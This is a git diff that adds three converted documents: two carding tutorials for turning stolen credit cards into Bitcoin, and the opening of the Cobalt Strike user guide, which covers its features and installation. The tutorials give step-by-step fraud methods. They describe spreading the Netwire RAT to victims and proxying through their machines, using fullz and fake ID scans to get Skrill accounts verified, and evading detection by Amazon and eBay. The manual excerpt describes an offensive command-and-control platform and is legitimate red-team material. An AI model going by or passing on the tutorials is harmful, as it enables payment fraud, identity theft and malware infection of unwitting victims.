diff --git a/cc to bitcoin_txt.md b/cc to bitcoin_txt.md
new file mode 100644
index 0000000..55cf070
--- /dev/null
+++ b/cc to bitcoin_txt.md
@@ -0,0 +1,74 @@
+# cc to bitcoin
+
+
+---
+
+.......CC to BTC 1 .........
+
+Hello, thank you for buying me this technique for optimal use please do not follow my instructions no.
+
+This technique is 100% functional is already tested by myself
+You will need:
+1-Netwire or Ip 100% clean
+
+if you do not want to pay $ 40 for the software netwire the best solution is to take the laptop and take a walk through your house to find WIFI.
+[To purchase Netwire GB http://www.worldwiredlabs.com/netwire_/
+Buy version 6 months was $ 40
+Spreader your server wawa mania / T411 / etc ...
+once on your victims netwire, use the reverse proxy to bypass Paypal Secus.]
+
+or socks vip72.org
+2-Ebay account with Feeds.
+
+3 CC [Not Linked to Paypal] Account Or Paypal OR Bank Account
+Direction Ebay.com
+Type "Bitcoin, Bitcoin 0.1, 0.1 BTC"
+Choose the "bone announcement"
+Here's a good example to start with:
+http://www.ebay.com/itm/BITCOIN-0-01 3ce0511930-BT ...
+
+Always Btc several at a time, in the ad that I give you the person selling 0.05, and have 14 items available so take 10 Never entire stock to avoid suspicion.
+When paying, if you pay by cc, check I do not have a paypal account.
+if you pay by paypal simply enter your ID.
+More waiting to get your BTC
+Do not forget to leave me a feed on the sale.
+
+___________________________________________________________________________________________________________________________________________________________________________
+
+.......CC to BTC 2.......
+
+TUTO CC> BTC
+
+Prerequisites:
+VMWorkstation (optional)
+Socks + VPN
+VISA FR / UK / US (test with VISA)
+Knowing card on amazon.
+
+1 Enable VPN + Socks less than 100km from the city linked to your CC.
+Enable VMWorkstation if you have, if not launch CCleaner and clear your cookies before you launch your browser.
+
+2 Go to the site and register http://purse.IO account. You can only make one transaction when you just sign up, its is released at the second transaction.
+
+3 Go to the transactions tab and select the amount of your interest among the offerings.
+(For the first time place an order between 30 and 90 dollars then you can go directly to the
+Orders over $ 800))
+
+4 Follow the instructions and the site will direct you to the desired object on amazon.co.uk
+
+-Create An account on amazon with the name and address of the CC
+-Activate Try out the amazon prime (just to the right of My account when you're logged in)
+-Add To cart desired by the buyer on amazon object.
+- Follow the instructions and shipping address choose the address indicated on purse.IO
+in the pre-recorded on amazon.
+
+If you want to have your BTC quickly choose fast delivery as they will be delivered by the escrow
+when the buyer has received the item BTC and confirmed on the site
+BUT more delivery time is short more control is likely to have an audit by amazon for example if you take one day shipping your order has a 30% chance to make check with phone connected to the DC.
+
+5 Wait until the buyer is delivered and that valid purse.io and make the transfer of your wallet has purse.IO, you can create multiple purse account with 1 cc to wink several transactions.
+
+Here, enjoy the friend. If you have any questions do not hesitate.
+
+https://mineoncloud.com/fr/
+https://www.happycoins.com/fr
diff --git a/cc2btc SKRILL_pdf.md b/cc2btc SKRILL_pdf.md
new file mode 100644
index 0000000..2c01c0e
--- /dev/null
+++ b/cc2btc SKRILL_pdf.md
@@ -0,0 +1,58 @@
+# cc2btc SKRILL
+
+
+---
+
+**Items needed**
+1. Fresh CC with CV and fullz info (sold by a number of vendors)********Note-If you find
+someone with SNN/DOB or mothers maiden name included with CC/CVV buy it
+quick. I can card almost any site with that info and the are sold all the time online.
+2. Id Scan(Make your own or by one from a vendor her on EVO)
+3.Recommended- A anon phone with number from the same area code as card holder.(I did
+not do this but still would not hurt)
+4.Valid Socks5 proxy from as close as possible as card holder(Before going any further go
+ahead and switch to your socks5 proxy now)
+**Lets get started**
+Before we card anything we need to clean our computer. (If you cant find these let me know,
+but they are all over the net)
+1. Download CCleaner (This will clean your computer)-This is free
+2. Download TMAC V.6 (This will change your Mac address)-This is free
+-Ok, run the CCleaner program and clean your PC.
+-Next run TMAC V.6 (When changing your MAC address pick a new address close to the
+card holder)
+-Now we need to open our command prompt.(go to start/run/type cmd). Once the command
+promt is open type the following....
+first type........ipconfig/ release ipconfig
+next type.........ipconfig/ renew ipconfig
+now type..........ipconfig/ flushdns
+Now you are ready!!!!!!!
+**Overview of how this works**
+1. We first need to open a skrill account at www.skrill.com.
+2. Use the card holders details to register at skrill.(Use a anonymous e-mail and phone number
+cause uoi will use them)
+3. Next add the CC information to the made skrill account.
+4. Now for the magic, the next step is to get verified, but do not do this on the website. Instead
+call there 1800 number
+and tell the rep that the online verification is not working and you need to get verified(Its best
+
+to use a phone number with same area code as card holder or you may
+draw a re flag). The rep will give you a e-mail address and ask you to send a copy front/back
+of your ID or passport.(Use the fake Id scan from one
+of the vendors you purchased here on the market place). Send th e ID scan and wait 30 minutes.
+**Note**
+Eventually they will ask for two forms of verification, if this happen just come to EVO
+and buy a fake utillity bill scan or similiar.
+5. Once you waited for thirty minutes call the 1800 number back and ask about your
+verification(This speeds up the proccess and raises the already high percentage of success)
+6. Once you hear the words "You are verified" then say thankyou and hang up.
+7. Now as long as your card is valid and have funds on it then add money to the skrill account
+and hall ass over to any site that accepts skrill for purchasing
+bitcoins(I used virwox but just google buy bitcoins with skrill cause there are better sites out
+there).
+******Notes*******
+1. Do not leave money in the skrill account, transfer your funds asap.
+2. Do not call the rep center with a guys voice and a girls card.
+3. Do not tell everyone about this or it will not work anymmore.
+4. Never use your own information, phone number, address, ect...
+5. Buy a socks5 proxy service, public proxys are slow and most are blacklisted and will not
+work for carding.
diff --git a/cobalt_cobalt-strike_userguide_pdf.md b/cobalt_cobalt-strike_userguide_pdf.md
new file mode 100644
index 0000000..2417ceb
--- /dev/null
+++ b/cobalt_cobalt-strike_userguide_pdf.md
@@ -0,0 +1,13080 @@
+# cobalt cobalt-strike userguide
+
+
+---
+
+Cobalt Strike
+User Guide
+
+CopyrightTermsandConditions
+Copyright©Fortra,LLCanditsgroupofcompanies.Alltrademarksandregisteredtrademarksarethepropertyoftheirrespective
+owners.
+ThecontentinthisdocumentisprotectedbytheCopyrightLawsoftheUnitedStatesofAmericaandothercountriesworldwide.The
+unauthorizeduseand/orduplicationofthismaterialwithoutexpressandwrittenpermissionfromFortraisstrictlyprohibited.Excerpts
+andlinksmaybeused,providedthatfullandclearcreditisgiventoFortrawithappropriateandspecificdirectiontotheoriginalcontent.
+202310100841-4.9.1
+
+Table of Contents
+Welcome to Cobalt Strike 10
+Overview 10
+InstallationandUpdates 11
+StartingtheTeamServer 20
+StartingaCobaltStrikeClient 21
+DistributedandTeamOperations 23
+ScriptingCobaltStrike 24
+RunningtheClientonMacOSX 26
+User Interface 28
+Overview 28
+Toolbar 28
+SessionandTargetVisualizations 29
+Tabs 32
+Consoles 32
+Tables 33
+KeyboardShortcuts 34
+Data Management 36
+Overview 36
+Targets 36
+Services 37
+Credentials 37
+CobaltStrikeUserGuide www.fortra.com page:iii
+
+TableofContents
+Maintenance 38
+Listener and Infrastructure Management 39
+Overview 39
+ListenerManagement 39
+CobaltStrike’sBeaconPayload 41
+PayloadStaging 43
+DNSBeacon 44
+HTTPBeaconandHTTPSBeacon 50
+SMBBeacon 56
+TCPBeacon 59
+ExternalC2 62
+ForeignListeners 64
+InfrastructureConsolidation 65
+Initial Access 67
+Client-sideSystemProfiler 67
+ApplicationBrowser 67
+CobaltStrikeWebServices 68
+User-drivenAttackPackages 68
+HostingFiles 79
+User-drivenWebDrive-byAttacks 79
+Client-sideExploits 83
+CloneaSite 84
+SpearPhishing 85
+CobaltStrikeUserGuide www.fortra.com page:iv
+
+TableofContents
+Payload Artifacts and Anti-virus Evasion 89
+TheArtifactKit 89
+TheVeilEvasionFramework 91
+JavaAppletAttacks 91
+TheResourceKit 92
+TheSleepMaskKit 92
+Post Exploitation 93
+BeaconCovertC2Payload 93
+TheBeaconConsole 93
+TheBeaconMenu 94
+AsynchronousandInteractiveOperations 94
+RunningCommands 95
+SessionPassing 96
+AlternateParentProcesses 97
+SpoofProcessArguments 97
+BlockingDLLsinChildProcesses 97
+UploadandDownloadFiles 98
+FileBrowser 98
+TheWindowsRegistry 99
+KeystrokesandScreenshots 100
+ControllingBeaconJobs 100
+TheProcessBrowser 101
+DesktopControl 102
+CobaltStrikeUserGuide www.fortra.com page:v
+
+TableofContents
+PrivilegeEscalation 103
+Mimikatz 107
+CredentialandHashHarvesting 107
+PortScanning 108
+NetworkandHostEnumeration 108
+TrustRelationships 109
+LateralMovement 111
+LateralMovementGUI 112
+BeaconDataStore 113
+OtherCommands 114
+Browser Pivoting 115
+Overview 115
+Setup 116
+Use 117
+HowBrowserPivotingWorks 118
+Pivoting 119
+WhatisPivoting 119
+SOCKSProxy 119
+ReversePortForward 120
+SpawnandTunnel 121
+PivotListeners 122
+CovertVPN 123
+SSH Sessions 126
+CobaltStrikeUserGuide www.fortra.com page:vi
+
+TableofContents
+TheSSHClient 126
+RunningCommands 126
+UploadandDownloadFiles 127
+Peer-to-peerC2 127
+SOCKSPivotingandReversePortForwards 128
+Malleable Command and Control 129
+Overview 129
+CheckingforErrors 129
+ProfileLanguage 130
+HTTPStaging 138
+ABeaconHTTPTransactionWalk-through 139
+HTTPHostProfiles 140
+HTTPServerConfiguration 143
+Self-signedSSLCertificateswithSSLBeacon 144
+ValidSSLCertificateswithSSLBeacon 145
+ProfileVariants 146
+HTTPBeacons 146
+CodeSigningCertificate 147
+DNSBeacons 148
+ExercisingCautionwithMalleableC2 150
+Malleable PE, Process Injection, and Post Exploitation 151
+Overview 151
+PEandMemoryIndicators 151
+CobaltStrikeUserGuide www.fortra.com page:vii
+
+TableofContents
+ProcessInjection 155
+ControllingProcessInjection 157
+ControllingPostExploitation 160
+Post-exUserDefinedReflectiveDLLLoader 163
+UserDefinedReflectiveDLL Loader 164
+Beacon Object Files 171
+WhataretheadvantagesofBOFs? 171
+HowdoBOFswork? 171
+WhatarethedisadvantagesofBOFs? 171
+HowdoIdevelopaBOF? 172
+DynamicFunctionResolution 173
+AggressorScriptandBOFs 174
+BOFCAPI 175
+FormattingBOFOutput 180
+Aggressor Script 186
+WhatisAggressorScript? 186
+HowtoLoadScripts 186
+TheScriptConsole 187
+HeadlessCobaltStrike 188
+AQuickSleepIntroduction 188
+InteractingwiththeUser 190
+CobaltStrike 191
+DataModel 195
+CobaltStrikeUserGuide www.fortra.com page:viii
+
+TableofContents
+Listeners 196
+Beacon 199
+SSHSessions 208
+OtherTopics 210
+Callbacks 213
+CustomReports 216
+CompatibilityGuide 218
+Hooks 220
+Events 239
+Functions 255
+PopupHooks 445
+Report-OnlyFunctions 446
+Reporting and Logging 458
+Logging 458
+Reports 458
+CustomLogoinReports 463
+CustomReports 464
+Appendix 466
+KeyboardShortcuts 466
+BeaconCommandBehaviorandOPSECConsiderations 467
+UnicodeSupport 473
+CobaltStrikeUserGuide www.fortra.com page:ix
+
+WelcometoCobaltStrike/Overview
+Welcome to Cobalt Strike
+CobaltStrikeisaplatformforadversarysimulationsandredteamoperations.Theproductis
+designedtoexecutetargetedattacksandemulatethepost-exploitationactionsofadvanced
+threatactors.ThissectiondescribestheattackprocesssupportedbyCobaltStrike’sfeatureset.
+Therestofthismanualdiscussesthesefeaturesindetail.
+Overview
+figure1-TheOffenseProblemSet
+Athought-outtargetedattackbeginswithreconnaissance.CobaltStrike’ssystemprofilerisa
+webapplicationthatmapsyourtarget’sclient-sideattacksurface.Theinsightsgleanedfrom
+reconnaissancewillhelpyouunderstandwhichoptionshavethebestchanceofsuccesson
+yourtarget.
+Weaponizationispairingapost-exploitationpayloadwithadocumentorexploitthatwill
+executeitontarget.CobaltStrikehasoptionstoturncommondocumentsintoweaponized
+artifacts.CobaltStrikealsohasoptionstoexportitspost-exploitationpayload,Beacon,ina
+varietyofformatsforpairingwithartifactsoutsideofthistoolset.
+UseCobaltStrike’sspearphishingtooltodeliveryourweaponizeddocumenttooneormore
+peopleinyourtarget’snetwork.CobaltStrike’sphishingtoolrepurposessavedemailsintopixel-
+perfectphishes.
+CobaltStrikeUserGuide www.fortra.com page:10
+
+WelcometoCobaltStrike/InstallationandUpdates
+Controlyourtarget’snetworkwithCobaltStrike’sBeacon.Thispost-exploitationpayloaduses
+anasynchronous“low and slow”communicationpatternthat’scommonwithadvancedthreat
+malware.BeaconwillphonehomeoverDNS,HTTP,orHTTPS.Beaconwalksthroughcommon
+proxyconfigurationsandcallshometomultiplehoststoresistblocking.
+Exerciseyourtarget’sattackattributionandanalysiscapabilitywithBeacon’sMalleable
+CommandandControllanguage.ReprogramBeacontouse network indicators that look like
+known malwareorblendinwithexistingtraffic.
+Pivotintothecompromisednetwork,discoverhosts,andmove laterallywithBeacon’shelpful
+automationandpeer-to-peercommunicationovernamedpipesandTCPsockets.CobaltStrike
+isoptimizedtocapturetrustrelationshipsandenablelateralmovementwithcaptured
+credentials,passwordhashes,accesstokens,andKerberostickets.
+DemonstratemeaningfulbusinessriskwithCobaltStrike’suser-exploitationtools.Cobalt
+Strike’sworkflowsmakeiteasytodeploykeystrokeloggersandscreenshotcapturetoolson
+compromisedsystems.Usebrowserpivotingtogainaccesstowebsitesthatyour
+compromisedtargetisloggedontowithInternetExplorer.ThisCobaltStrike-onlytechnique
+workswithmostsitesandbypassestwo-factorauthentication.
+CobaltStrike’sreportingfeaturesreconstruct the engagementforyourclient.Providethe
+networkadministratorsanactivitytimelinesotheymayfindattackindicatorsintheirsensors.
+CobaltStrikegenerateshighqualityreportsthatyoumaypresenttoyourclientsasstand-alone
+productsoruseasappendicestoyourwrittennarrative.
+Throughouteachoftheabovesteps,youwillneedtounderstandthetargetenvironment,its
+defenses,andreasonaboutthebestwaytomeetyourobjectiveswithwhatisavailabletoyou.
+Thisisevasion.ItisnotCobaltStrike’sgoaltoprovideevasionout-of-the-box.Instead,the
+productprovidesflexibility,bothinitspotentialconfigurationsandoptionstoexecuteoffense
+actions,toallowyoutoadapttheproducttoyourcircumstanceandobjectives.
+Installation and Updates
+FortraLLCdistributesCobaltStrikepackagesasnativearchivesforWindows,Linux,and
+MacOSX.
+CobaltStrikeusesaclient/servermodelwhereeachcomponentcanbeinstalledonthesame
+system,butisoftendeployedseparately.TheCobaltStrikeGUIisreferredtoas‘CobaltStrike’,
+the‘CobaltStrikeGUI’,orthecommandusedtostarttheclient‘cobaltstrike’.TheCobaltStrike
+serverisreferredtoas‘TeamServer’orthecommandusedtostarttheserver‘teamserver’.
+ThebasicprocesstoinstallCobaltStrikeinvolvesdownloadingandextractingadistribution
+packageontoyouroperatingsystemandrunninganupdateprocesstodownloadtheproduct.
+CobaltStrikeUserGuide www.fortra.com page:11
+
+WelcometoCobaltStrike/InstallationandUpdates
+Before You Begin
+ReadthissectionbeforeyouinstallCobaltStrike.
+System Requirements
+ThefollowingitemsarerequiredforanysystemhostingtheCobaltStrikeclientand/orserver
+components.
+Java
+CobaltStrike'sGUIclientandteamserverrequireoneofthefollowingJavaenvironments:
+l OracleJava1.8
+l OracleJava11
+l OpenJDK11.(seeInstalling OpenJDK on page 13forinstructions)
+NOTE:
+IfyourorganizationdoesnothavealicensethatallowscommercialuseofOracle'sJava,
+weencourageyoutouseOpenJDK11.
+SupportedOperatingSystems
+CobaltStrikeTeamServerissupportedonaLinuxsystemthatmeetstheJavarequirements
+andhasbeentestedonthefollowingDebianbasedLinuxdistributions(otherversionsmaywork
+buthavenotbeentested):
+l Debian
+l Ubuntu
+l KaliLinux
+CobaltStrikeClientrunsonthefollowingsystems:
+l Windows7andabove
+l MacOSX10.13andabove
+l GUIbasedLinux,suchas:Debian,UbuntuandKaliLinux(otherversionsmayworkbut
+havenotbeentested)
+Hardware
+CobaltStrikeUserGuide www.fortra.com page:12
+
+WelcometoCobaltStrike/InstallationandUpdates
+Inadditiontoanacceptedoperatingsystem,thebelowminimumrequirementsshouldbemet:
+l 2GHz+processor
+l 2GBRAM
+l 500MB+availablediskspace
+OnAmazon'sEC2,useatleastaHigh-CPUMedium(c1.medium,1.7GB)instance.
+Linuxglibc
+BeawarethatcertainLinuxdistributionsmaybemissingordon'thavethecorrectversionof
+glibc.Ifyourunintothatissue,reviewtheKnowledgeArticle,glibcMissingFromOlderLinux
+Distributions,ontheFortraPortal.
+Installing OpenJDK
+CobaltStrikeistestedwithOpenJDK11anditslaunchersarecompatiblewithaproperly
+installedOpenJDK11environment.
+Linux(Kali2018.4,Ubuntu18.04)
+1. UpdateAPT:
+sudo apt-get update
+2. InstallOpenJDK11withAPT:
+sudo apt-get install openjdk-11-jdk
+3. MakeOpenJDK11thedefault:
+sudo update-java-alternatives -s java-1.11.0-openjdk-amd64
+Linux(Other)
+1. UninstallthecurrentOpenJDKpackage(s).
+2. DownloadOpenJDKforLinux/x64at:https://jdk.java.net/archive/.
+3. ExtracttheOpenJDKbinary:
+tar zxvf openjdk-11.0.1_linux-x64_bin.tar.gz
+4. MovetheOpenJDKfolderto/usr/local:
+mv jdk-11.0.1 /usr/local
+5. Addthefollowingto~/.bashrc:
+JAVA_HOME="/usr/local/jdk-11.0.1"
+CobaltStrikeUserGuide www.fortra.com page:13
+
+WelcometoCobaltStrike/InstallationandUpdates
+PATH=$PATH:$JAVA_HOME/bin
+6. Refreshyour~/.bashrc tomakethenewenvironmentvariablestakeeffect:
+source ~/.bashrc
+MacOSX
+1. DownloadOpenJDKformacOS/x64at:https://jdk.java.net/archive/.
+2. OpenaTerminalandnavigatetotheDownloads/ folder.
+3. Extractthearchive:
+tar zxvf openjdk-11.0.1_osx-x64_bin.tar.gz
+4. Movetheextractedarchiveto/Library/Java/JavaVirtualMachines/:
+sudo mv jdk-11.0.1.jdk/ /Library/Java/JavaVirtualMachines/
+ThejavacommandonMacOSXwillusethehighestJavaversionin/Library/Javaasthe
+default.
+TIP:
+IfyouareseeingaJRELoadError messagethisisbecausetheJavaAppLauncherstub
+includedwithCobaltStrikeloadsalibraryfromasetpathtoruntheJVMwithinthestub
+process.Issuethefollowingcommandtofixthiserror:
+sudo ln -fs /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk
+/Library/Internet\ Plug-Ins/JavaAppletPlugin.plugin
+Replacejdk-11.0.2.jdkwithyourJavapath.ThenextCobaltStrikereleasewilluseaJava
+ApplicationStubforMacOSXthatismoreflexible.
+Windows
+1. DownloadOpenJDKforWindows/x64at:https://jdk.java.net/archive/.
+2. Extractthearchivetoc:\program files\jdk-11.0.1.
+3. Addc:\program files\jdk-11.0.\bin toyouruser'sPATHenvironmentvariable:
+a. GotoControl Panel-> System-> Change Settings-> Advanced-> Environment
+Variables....
+b. HighlightPathinUser variables for user.
+c. PressEdit.
+d. PressNew.
+e. Type:c:\program files\jdk-11.0.1\bin.
+f. PressOKonalldialogs.
+Wayland Desktop - Not Supported
+CobaltStrikeUserGuide www.fortra.com page:14
+
+WelcometoCobaltStrike/InstallationandUpdates
+WaylandisamodernreplacementfortheXWindowsSystem.Waylandhasmadegreatstrides,
+asaproject,andsomedesktopenvironmentsuseitastheirdefaultwindowsystem.Don'tlet
+theadoptionfoolyouthough.Notallapplicationsorapplicationenvironmentswork100%
+perfectlyonWayland.Therearestillbugsandissuestoaddress.
+TherearebugsinJava(orWayland)thatmaycauseagraphicalJavaapplicationtocrash,
+duringnormaluse,whenruninaWaylanddesktop.ThesebugsaffectCobaltStrikeusers.
+Fortra does not support the use of Cobalt Strike on Wayland desktops.
+Am IusingWayland?
+Typeecho $XDG_SESSION_TYPEtofindoutifyou'reonwaylandorx11.
+HowtodisableWaylandonKaliLinux
+ThelatestversionofKaliLinux2017RollingusesaWaylanddesktopbydefault.Tochangethis
+backtoX11:
+1. Open/etc/gdm3/daemon.confwithyourfavoritetexteditor.
+2. Findthe[daemon]section.
+3. AddWaylandEnable=falseandrebootyoursystem.
+Installing Cobalt Strike
+FollowtheseinstructionstoinstallCobaltStrike.
+NOTE:
+TheCobaltStrikeDistribution Package(steps1and3)containstheOS-specificCobalt
+Strikelauncher(s),supportingfiles,andtheupdaterprogram.ItdoesnotcontaintheCobalt
+Strikeprogramitself.RunningtheUpdate Program(step4)downloadstheCobaltStrike
+productandperformsthefinalinstallationsteps.
+1. DownloadaCobaltStrikedistributionpackageforasupportedoperatingsystem.(an
+emailisprovidedwithalinktothedownload)
+2. SetuparecommendedJavaenvironment.(seeInstalling OpenJDK on page 13for
+instructions)
+CobaltStrikeUserGuide www.fortra.com page:15
+
+WelcometoCobaltStrike/InstallationandUpdates
+3. Extract,mountorunzipthedistributionpackage.Basedontheoperatingsystem
+perform oneofthefollowing.
+a. ForLinux:
+i. Extractthecobaltstrike-dist.tgz:
+tar zxvf cobaltstrike-dist.tgz
+b. ForMacOSX:
+i. Double-clickthecobaltstrike-dist.dmg filetomountit.
+ii. DragtheCobalt StrikefoldertotheApplicationsfolder.
+c. ForWindows:
+i. Disableanti-virusbeforeyouinstallCobaltStrike.
+ii. Useyourpreferredziptooltoextractthecobaltstike.zip filetoaninstall
+location.
+4. Runtheupdateprogram tofinishtheinstall.Basedontheoperatingsystem perform
+oneofthefollowing.
+a. ForLinux:
+i. Enterthefollowingcommands:
+cd /path/to/cobaltstrike
+./update
+b. ForMacOSX:
+i. NavigatetotheCobalt Strikefolder.
+ii. Double-clickUpdate Cobalt Strike.command.
+c. ForWindows:
+i. NavigatetotheCobalt Strikefolder.
+ii. Double-clickupdate.bat.
+Makesureyouupdatebothyourteamserverandclientsoftwarewithyourlicensekey.Cobalt
+Strikeisgenerallylicensedonaperuserbasis.Theteamserverdoesnotrequireaseparate
+license.
+License Authorization Files
+ThelicensedversionofCobaltStrikerequiresavalidauthorizationfiletostart.Anauthorization
+fileisanencryptedblobthatprovidesinformationaboutyourlicensetotheCobaltStrike
+product.
+CobaltStrikeUserGuide www.fortra.com page:16
+
+WelcometoCobaltStrike/InstallationandUpdates
+Authorizationfilesarenowassociatedtoaspecificrelease.Authorizationfilesfor4.8andearlier
+willcontinuetobebackwardcompatible.Authorizationfilesfor4.9andlaterwillonlybevalidfor
+thespecificversion.
+How doI get an authorization file?
+Thebuilt-inupdateprogramrequestsanauthorizationfilefromCobaltStrike'supdateserver
+whenit'srun.Theupdateprogramdownloadsanewauthorizationfileforthecurrentreleased
+version,evenifyourCobaltStrikeversionisuptodate.Thisallowstheauthorizationfiletostay
+currentwiththelicensedatesinFortrarecords.
+InordertogetanauthorizationfileforapreviousversionusetheCobaltStrikeAuthFile
+Generatorsite.Thissitewillgenerateanauthorizationfilefortheversionandlicensekeyyou
+enteronthepage.Usethedownloadlinktoretrievetheauthorizationfileorusetheinstructions
+onthepagetoconvertthebase64encodedstringtoanauthorizationfile.Thencopythe
+authorizationfiletoyourCobaltStrikeinstallationdirectory.
+What happenswhen my licenseexpires?
+CobaltStrikewillrefusetostartwhenitsauthorizationfileexpires.Additionally,thelicensed
+CobaltStrikeproductchecksauthorizationfilesdaily.Iftheauthorizationfileexpireswhile
+CobaltStrikeisrunning,theteamserverkeepsrunningforanadditional14daysgraceperiod.
+Theteamserverwillshutdowniftheauthorizationfileisnotreplacedduringthatperiod.
+Details:
+l Teamserverchecksthelicenseatstartupandat10AMeveryday.
+l Theteamserverlicenseexpirationisloggedintheeventlogwhentheteam serverstarts.
+l Clientsconnectedtoateamserverwilldisplayalicensewarningribbonstarting45days
+priortolicenseexpiration.
+l Runningteamserverswillhavea14daygraceperiodbeforetheserverisshutdown
+duringthedailylicensecheck.
+l Ifyouneedtoextendthelicenseforarunningteamserver,youcaninstall/update
+CobaltStrikeinadifferentlocationandcopy/replacethe“cobaltstrike.auth”filefrom the
+newinstallintotherunninginstance.Iftheteamserverversionispriortothecurrent
+releasedversionthenusetheCobaltStrikeAuthFileGeneratorsiteinstead.
+When doesmy authorization fileexpire?
+YourauthorizationfileexpireswhenyourCobaltStrikelicenseexpires.IfyourenewyourCobalt
+Strikelicense,runthebuilt-inupdateprogramtorefreshtheauthorizationfileforthecurrent
+CobaltStrikeUserGuide www.fortra.com page:17
+
+WelcometoCobaltStrike/InstallationandUpdates
+releasedversionwiththelatestinformation.ForpreviousversionsusetheCobaltStrikeAuth
+FileGeneratorsitetorefreshtheauthorizationfilewiththelatestinformation.
+GotoHelp->System Informationtofindoutwhenyourauthorizationfileexpires.Lookforthe
+"validto"valueundertheOthersection.Remember,theClientInformationandTeamServer
+Informationmayhavedifferentvalues(dependingonwhichlicensekeywasusedandwhenthe
+authorizationfilewaslastrefreshed).
+CobaltStrikewillalsowarnyouwhenitsauthorizationfileiswithin45daysofitsvalidtodate.
+How doI bring an authorization fileintoa closed environment?
+Theauthorizationfileiscobaltstrike.auth.Theupdateprogramalwaysco-locatesthisfilewith
+cobaltstrike.jar.TouseCobaltStrikeinaclosedenvironment:
+1. DownloadtheCobaltStrikepackageathttps://www.cobaltstrike.com/download
+2. UpdatetheCobaltStrikepackagefrom aninternetconnectedsystem
+3. Copythecontentsoftheupdatedcobaltstrike/folderintoyourenvironment.Themost
+importantfilesarecobaltstrike.jarandcobaltstrike.auth.
+DoesCobalt StrikephonehometoFortra?
+Beyondtheupdateprocess,CobaltStrikedoesnot"phonehome"toFortra.Theauthorization
+fileisgeneratedbytheupdateprocess.
+How doI usean older version ofCobalt Strikewith a refreshed authorization
+file?
+InordertogetanauthorizationfileforapreviousversionusetheCobaltStrikeAuthFile
+Generatorsite.Thissitewillgenerateanauthorizationfilefortheversionandlicensekeyyou
+enteronthepage.Usethedownloadlinktoretrievetheauthorizationfileorusetheinstructions
+onthepagetoconvertthebase64encodedstringtoanauthorizationfile.Thencopythe
+authorizationfiletoyourCobaltStrikeinstallationdirectory.
+WhatistheCustomerIDvalue?
+TheCustomerIDisa4-bytenumberassociatedwithaCobaltStrikelicensekey.CobaltStrike
+3.9andlaterembedthisinformationintothepayloadstagersandstagesgeneratedbyCobalt
+Strike.
+How doI find theCustomer ID valuein a Cobalt Strikeartifact?
+CobaltStrikeUserGuide www.fortra.com page:18
+
+WelcometoCobaltStrike/InstallationandUpdates
+TheCustomerIDvalueisthelast4-bytesofaCobaltStrikepayloadstagerinCobaltStrike3.9
+andlater.
+ThisscreenshotistheHTTPstagerfromthetrial.ThetrialhasaCustomerIDvalueof0.The
+last4-bytesofthisstager(0x0,0x0,0x0,0x0)reflectthis.
+figure2-HTTPPayloadStager(CobaltStrikeTrial)
+TheCustomerIDvaluealsoexistsinthepayloadstage,butit'smorestepstorecover.Cobalt
+StrikedoesnotusetheCustomerIDvalueinitsnetworktrafficorotherpartsofthetool.
+How doI protect disparatered team infrastructurefrom cross-identification
+with thisID?
+Ifyouhaveauniqueauthorizationfileoneachteamserver,theneachteamserverandthe
+artifactsthatoriginatefromitwillhaveadifferentID.
+CobaltStrike'supdateservergeneratesanewauthorizationfileeachtimetheupdateprogram
+isrun.EachauthorizationfilehasauniqueID.CobaltStrikeonlypropagatestheteamserver's
+ID.ItdoesnotpropagatetheIDfromtheGUIorheadlessclient'sauthorizationfile.
+After You are Done
+Congratulations!CobaltStrikeisnowinstalled.Readthefollowingforadditionalinformationand
+yournextsteps.
+Next Steps
+Starting the Team Server on page 20
+Starting a Cobalt Strike Client on page 21
+CobaltStrikeUserGuide www.fortra.com page:19
+
+WelcometoCobaltStrike/StartingtheTeamServer
+Starting the Team Server
+CobaltStrikeissplitintoclientandaservercomponents.Theserver,referredtoastheteam
+server,isthecontrollerfortheBeaconpayloadandthehostforCobaltStrike’ssocial
+engineeringfeatures.TheteamserveralsostoresdatacollectedbyCobaltStrikeandit
+manageslogging.
+TheCobaltStriketeamservermustrunonasupportedLinuxsystem.TostartaCobaltStrike
+teamserver,issuethefollowingcommandtoruntheteamserverscriptincludedwiththe
+CobaltStrikeLinuxpackage:
+figure3-StartingtheTeamServer
+./teamserver [ ]
+Theteamserverscriptusesthefollowingtwomandatoryandtwooptionalparameters:
+IP Address-(mandatory)EntertheexternallyreachableIPaddressoftheteamserver.Cobalt
+Strikeusesthisvalueasadefaulthostforitsfeatures.
+Password-(mandatory)Enterapasswordthatyourteammemberswillusetoconnectthe
+CobaltStrikeclienttotheteamserver.
+Malleable C2 Profile-(optional)SpecifyavalidMalleableC2Profile.SeeMalleable Command
+and Control on page 129formoreinformationonthisfeature.
+Kill Date-(optional)EnteradatevalueinYYYY-MM-DDformat.Theteamserverwillembedthis
+killdateintoeachBeaconstageitgenerates.TheBeaconpayloadwillrefusetorunonor
+afterthisdateandwillalsoexitifitwakesuponorafterthisdate.
+Whentheteamserverstarts,itwillpublishtheSHA256hashoftheteamserver’sSSL
+certificate.Distributethishashtoyourteammembers.Whenyourteammembersconnect,
+theirCobaltStrikeclientwillaskiftheyrecognizethishashbeforeitauthenticatestotheteam
+server.Thisisanimportantprotectionagainstman-in-the-middleattacks.
+Team Server Properties File
+CobaltStrikeUserGuide www.fortra.com page:20
+
+WelcometoCobaltStrike/StartingaCobaltStrikeClient
+TeamServer.propisanoptionalfilecontaininganumberofparametersthatcanbeusedto
+customizesettings.Thisfileisnotincludedinthedistributionasthedefaultsarethe
+recommendedsettings.Ifthereisaneedtomodifythesettings,downloadthedefault
+TeamServer.propfilefromhttps://github.com/Cobalt-Strike/teamserver-proprepositoryinto
+theCobaltStrikeinstallationdirectory.Makeanymodificationsandrestarttheteamserver.
+ForadditionalinformationonasettingseetheREADME.mdintherepositoryandcommentsin
+theTeamServer.propfile.
+Starting a Cobalt Strike Client
+FollowthestepsbelowtoconnecttheCobaltStrikeclienttotheteamserver.
+Steps
+1. TostarttheCobaltStrikeclient,usethelauncherincludedwithyourplatform’spackage.
+a. ForLinux:
+i. Enterthefollowingcommands:
+./cobaltstrike
+b. ForMacOSX:
+i. NavigatetotheCobalt Strikefolder.
+ii. Double-clickcobaltstrike.
+c. ForWindows:
+i. NavigatetotheCobalt Strikefolder.
+ii. Double-clickcobaltstrike.exe.
+TheConnectDialogscreendisplays.
+CobaltStrikeUserGuide www.fortra.com page:21
+
+WelcometoCobaltStrike/StartingaCobaltStrikeClient
+figure 4 - CobaltStrikeConnectDialog
+2. CobaltStrikekeepstrackoftheteam serversyouconnecttoandremembersyour
